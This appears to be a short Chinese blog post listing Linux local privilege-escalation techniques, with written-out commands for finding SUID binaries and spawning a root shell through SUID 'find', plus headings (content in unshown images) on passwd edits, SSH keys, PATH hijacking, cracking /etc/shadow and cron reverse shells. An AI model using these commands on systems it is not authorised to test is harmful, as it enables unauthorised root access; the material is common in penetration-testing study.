首页 > 技术文章 > Linux本地提取的N种姿势

oldliutou 2021-11-23 17:45 原文

find(suid)

find -name flag.txt -exec /bin/sh \;

查找系统中设置suid位的程序(提权的快捷方式)

find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000-print2>/dev/null
find / -user root -perm -4000-exec ls -ldb {} \;

image

搜索文件进行提取

https://gtfobins.github.io/

find . -exec /bin/sh -p \; -quit

image

passwd提权

image

image

ssh密钥提权

劫持环境变量

find / -perm -u=s -type f 2>/dev/null

image

image

image

image

破解密码

利用/etc/shadow文件中root字段信息破解密码
image

计划定时任务反弹shell提权

image
image
image

推荐阅读